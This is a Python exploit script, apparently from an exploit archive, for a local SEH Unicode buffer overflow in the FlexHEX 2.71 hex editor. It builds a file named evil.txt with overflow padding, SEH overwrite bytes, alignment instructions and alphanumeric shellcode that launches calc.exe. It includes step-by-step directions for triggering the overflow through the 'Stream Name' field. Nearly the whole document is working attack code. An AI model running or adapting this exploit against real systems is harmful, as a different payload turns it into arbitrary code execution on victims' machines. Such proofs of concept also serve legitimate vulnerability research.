60 lines
No EOL
1.6 KiB
Python
Executable file
60 lines
No EOL
1.6 KiB
Python
Executable file
#!/usr/bin/python -w
|
|
|
|
#
|
|
# Exploit Author: Chris Au
|
|
# Exploit Title: FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode)
|
|
# Date: 06-04-2019
|
|
# Vulnerable Software: FlexHEX 2.71
|
|
# Vendor Homepage: http://www.flexhex.com
|
|
# Version: 2.71
|
|
# Software Link: http://www.flexhex.com/download/flexhex_setup.exe
|
|
# Tested Windows Windows XP SP3
|
|
#
|
|
#
|
|
# PoC
|
|
# 1. generate evil.txt, copy contents to clipboard
|
|
# 2. open FlexHEX Editor
|
|
# 3. select "Stream", click "New Stream..."
|
|
# 4. paste contents from clipboard in the "Stream Name:"
|
|
# 5. select OK
|
|
# 6. calc.exe
|
|
#
|
|
|
|
filename="evil.txt"
|
|
junk = "\xcc" * 276
|
|
nseh = "\x90\x45"
|
|
seh = "\xd5\x52" #pop pop retn
|
|
valign = (
|
|
"\x45" #align
|
|
"\x56" #push esi
|
|
"\x45" #align
|
|
"\x58" #pop eax
|
|
"\x45" #align
|
|
"\x05\x20\x11" #add eax,11002000
|
|
"\x45" #align
|
|
"\x2d\x1a\x11" #sub eax,11001a00
|
|
"\x45" #align
|
|
"\x50" #push eax
|
|
"\x45" #align
|
|
"\xc3" #retn
|
|
)
|
|
#nop to shell
|
|
nop = "\x45" * 94
|
|
#call calc.exe, bufferRegister=EAX
|
|
shellcode = (
|
|
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
|
|
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
|
|
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
|
|
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
|
|
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
|
|
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
|
|
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
|
|
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
|
|
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
|
|
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
|
|
"Lnc51hOuipAA")
|
|
fill = "\x45" * 5000
|
|
buffer = junk + nseh + seh + valign + nop + shellcode + fill
|
|
textfile = open(filename , 'w')
|
|
textfile.write(buffer)
|
|
textfile.close() |